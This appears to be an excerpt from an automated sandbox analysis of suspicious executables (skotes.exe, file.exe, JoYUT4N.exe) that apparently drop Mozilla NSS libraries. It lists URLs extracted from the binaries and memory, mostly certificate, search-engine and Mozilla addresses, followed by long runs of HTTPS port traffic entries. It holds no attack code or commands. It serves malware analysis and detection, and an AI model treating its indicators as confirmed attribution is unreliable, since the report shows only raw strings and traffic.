Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, JoYUT4N[1].exe.23.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, JoYUT4N[1].exe.23.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, JoYUT4N[1].exe.23.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://subca.ocsp-certum.com05
Source: chromecache_175.6.dr	String found in binary or memory: http://www.broofa.com
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, JoYUT4N[1].exe.23.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: skotes.exe, 00000017.00000002.3389127239.0000000001279000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, JoYUT4N[1].exe.23.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr, JoYUT4N.exe.23.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2745251337.000000001D08D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2754050944.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: KFCFBAAE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_175.6.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: KFCFBAAE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KFCFBAAE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2722572353.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, KFCFBAAE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_175.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_175.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_175.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_175.6.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_175.6.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: KFCFBAAE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_175.6.dr	String found in binary or memory: https://www.google.com
Source: KFCFBAAE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_175.6.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_175.6.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_175.6.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/GHCBGCAKFIII
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2720322383.00000000005A4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2720322383.0000000000687000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: KFBFCAFCBKFIEBFHIDBAKJJJJE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.2748285132.00000000230C5000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJ.0.dr	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
